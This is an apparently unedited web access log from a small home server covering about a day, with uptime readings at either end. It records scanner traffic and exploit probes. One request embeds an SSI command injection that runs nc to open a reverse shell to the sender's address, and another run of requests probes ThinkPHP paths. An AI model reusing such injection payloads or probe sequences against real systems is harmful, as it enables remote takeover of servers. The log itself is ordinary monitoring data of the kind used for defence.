Sat Feb 29 06:25:15 MST 2020 06:25:15 up 4 days, 11:53, 1 user, load average: 2.52, 1.70, 0.87 USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT pi tty7 :0 Mon12 4days 4:44 0.86s /usr/bin/lxsession -s LXDE-pi -e LXDE 61.219.11.153 - - [29/Feb/2020:13:52:34 +0000] "UNKNOWN UNKNOWN" 0 0 "" "" 139.162.106.181 - - [29/Feb/2020:15:33:14 +0000] "GET / HTTP/1.1" 200 25000 "" "HTTP Banner Detection (https://security.ipip.net)" 35.233.105.134 - - [29/Feb/2020:16:08:46 +0000] "GET / HTTP/1.1" 200 25000 "" "python-requests/2.18.4" 35.205.86.202 - - [29/Feb/2020:17:33:26 +0000] "GET / HTTP/1.1" 200 25000 "" "python-requests/2.18.4" 78.189.229.131 - - [29/Feb/2020:17:47:12 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 41.216.186.89 - - [29/Feb/2020:18:21:51 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 109.94.125.71 - - [29/Feb/2020:18:46:12 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36" 187.113.56.188 - - [29/Feb/2020:18:49:27 +0000] "GET / HTTP/1.1" 400 0 "" "" 37.49.226.137 - - [29/Feb/2020:18:53:43 +0000] "GET /incl/image_test.shtml?camnbr=%3c%21--%23exec%20cmd=%22mkfifo%20/tmp/s;nc%20-w%205%2037.49.226.137%2029312%200%3C/tmp/s|/bin/sh%3E/tmp/s%202%3E/tmp/s;rm%20/tmp/s%22%20--%3e HTTP/1.0" 404 0 "" "" 181.134.19.21 - - [29/Feb/2020:19:25:27 +0000] "GET / HTTP/1.1" 400 0 "" "" 193.202.44.194 - - [29/Feb/2020:19:41:36 +0000] "UNKNOWN UNKNOWN" 0 0 "" "" 193.202.44.194 - - [29/Feb/2020:19:41:36 +0000] "HEAD /robots.txt HTTP/1.0" 200 0 "" "" 173.212.218.126 - - [29/Feb/2020:20:49:02 +0000] "GET / HTTP/1.0" 200 25000 "" "masscan/1.0 (https://github.com/robertdavidgraham/masscan)" 35.233.105.134 - - [29/Feb/2020:20:59:18 +0000] "GET / HTTP/1.1" 200 25000 "" "python-requests/2.18.4" 86.35.182.166 - - [29/Feb/2020:21:14:17 +0000] "GET / HTTP/1.1" 400 0 "" "" 209.97.190.223 - - [29/Feb/2020:23:52:54 +0000] "GET / HTTP/1.0" 200 25000 "" "masscan/1.0 (https://github.com/robertdavidgraham/masscan)" 198.199.92.90 - - [01/Mar/2020:00:14:22 +0000] "GET /hudson HTTP/1.1" 404 0 "" "Mozilla/5.0 zgrab/0.x" 103.81.95.75 - - [01/Mar/2020:04:15:47 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36" 123.18.124.11 - - [01/Mar/2020:04:22:02 +0000] "GET / HTTP/1.1" 400 0 "" "" 41.211.100.137 - - [01/Mar/2020:05:07:45 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36" 181.210.91.209 - - [01/Mar/2020:05:26:04 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36" 201.206.34.146 - - [01/Mar/2020:06:22:00 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36" 35.205.86.202 - - [01/Mar/2020:06:35:08 +0000] "GET / HTTP/1.1" 200 25000 "" "python-requests/2.18.4" 121.36.224.111 - - [01/Mar/2020:09:15:40 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 121.36.224.111 - - [01/Mar/2020:09:15:44 +0000] "GET /TP/public/index.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)" 121.36.224.111 - - [01/Mar/2020:09:15:45 +0000] "GET /TP/index.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)" 121.36.224.111 - - [01/Mar/2020:09:15:45 +0000] "GET /thinkphp/html/public/index.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)" 121.36.224.111 - - [01/Mar/2020:09:15:47 +0000] "GET /html/public/index.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)" 121.36.224.111 - - [01/Mar/2020:09:15:47 +0000] "GET /public/index.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)" 121.36.224.111 - - [01/Mar/2020:09:15:48 +0000] "GET /TP/html/public/index.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)" 121.36.224.111 - - [01/Mar/2020:09:15:48 +0000] "GET /elrekt.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)" 121.36.224.111 - - [01/Mar/2020:09:15:49 +0000] "GET /index.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)" 121.36.224.111 - - [01/Mar/2020:09:15:50 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)" 172.104.242.173 - - [01/Mar/2020:09:35:09 +0000] "UNKNOWN UNKNOWN" 0 0 "" "" 213.242.24.111 - - [01/Mar/2020:10:23:53 +0000] "GET / HTTP/1.1" 400 0 "" "" 128.14.134.170 - - [01/Mar/2020:10:38:34 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 " 198.199.116.96 - - [01/Mar/2020:10:39:55 +0000] "GET /portal/redlion HTTP/1.1" 404 0 "" "Mozilla/5.0 zgrab/0.x" 178.92.46.98 - - [01/Mar/2020:11:28:09 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36" 193.202.44.194 - - [01/Mar/2020:11:32:01 +0000] "UNKNOWN UNKNOWN" 0 0 "" "" 193.202.44.194 - - [01/Mar/2020:11:32:01 +0000] "HEAD /robots.txt HTTP/1.0" 200 0 "" "" 179.98.144.153 - - [01/Mar/2020:11:51:19 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36" 151.235.191.217 - - [01/Mar/2020:11:56:55 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36" 2.85.88.248 - - [01/Mar/2020:13:04:30 +0000] "UNKNOWN UNKNOWN" 408 0 "" "" Sun Mar 1 06:25:26 MST 2020 06:25:26 up 5 days, 11:54, 1 user, load average: 2.73, 1.55, 0.79 USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT pi tty7 :0 Mon12 5days 5:19 0.86s /usr/bin/lxsession -s LXDE-pi -e LXDE